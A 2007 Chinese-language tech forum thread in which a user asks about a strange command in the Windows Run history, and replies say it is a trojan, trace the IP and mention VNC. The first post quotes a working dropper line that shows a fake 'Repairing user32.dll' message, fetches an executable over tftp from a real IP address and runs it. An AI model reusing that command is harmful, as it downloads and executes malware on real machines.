|
||
|
*停權中*
加入日期: Apr 2002
文章: 328
|
最近在windows中的「執行」裡常看到一行怪東西……
有時候想要在執行中打regedit時會發現裡面已經有一行不知道是什麼指令,我把它貼上來:
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.115.180.126 GET ietoqbgb.exe & start ietoqbgb& 這一行是什麼東西呢?以前沒看過阿,我有用ultra vnc,會是因為vnc的關係嗎?還是有人在我的電腦裡亂來?? |
|||||||
2007-03-19, 09:00 AM
#1
|
|
|
Major Member
 加入日期: Mar 2005
文章: 211
|
看起來的感覺是中毒。
好像你開機時會自動 下載一些程式(病毒)
__________________
可憐的末代k7機:1號 cpu : sempron 2400+ MB :MSI k7n2-delta2-LSR HD1 :日立sata 80g*2 (raid 0) HD2 : maxtor 40g /7200RPM power:hec 480w RAM :kingstone 512*2 lite-on combol pioneer A09 LINUX and bt專用機:2號 k6-2-350 oc 500 IBM 30G 7200 RPM SDRAM 128*2 256*1 |
||
|
2007-03-19, 09:14 AM
#2
|
|
|
Regular Member
 加入日期: Aug 2006
文章: 76
|
你想..沒事從外面拉個檔案做啥呢?
69.115.180.126 查一下是誰吧... |
|
2007-03-19, 10:20 AM
#3
|
|
|
*停權中*
加入日期: Apr 2002
文章: 328
|
怎麼查??請中華電信查嗎??還是有別的方法查??查到後要幹嘛??
|
|
2007-03-19, 10:30 AM
#4
|
|
|
Junior Member
  
加入日期: Jul 2004 您的住址: Verthandi的懷裡
文章: 766
|
我只知道我查到這個
ool-4573b47e.dyn.optonline.net 這是啥我也不清楚 ^_^ |
|
2007-03-19, 01:23 PM
#5
|
|
|
Senior Member
加入日期: Jul 2004 您的住址: Burn Notice
文章: 1,059
|
http://www.dslreports.com/archive/optonline.net
dyn.optonline.net 是美國東岸一家叫Cablevision的ISP業者, 有提供xDSL, Cable等服務 被駭了嗎 ??? ietoqbgb.exe <--- 這是什麼怪東西 |
|
2007-03-19, 01:44 PM
#6
|
|
|
Master Member
加入日期: Oct 2004 您的住址: 貓窩
文章: 1,973
|
中招了,反AD & Trojan的軟體下去掃瞄吧!!
|
|
2007-03-19, 04:19 PM
#7
|
|
|
Major Member
加入日期: Aug 2006
文章: 107
|
想查大約的IP資料
請愛用 Mintac.com WHOIS 資料庫 |
|
2007-03-19, 04:57 PM
#8
|
|
|
New Member
加入日期: Mar 2007
文章: 1
|
...你都有安裝VNC吧!?
大家可看這個 |
|
2007-03-26, 08:29 PM
#9
|
|
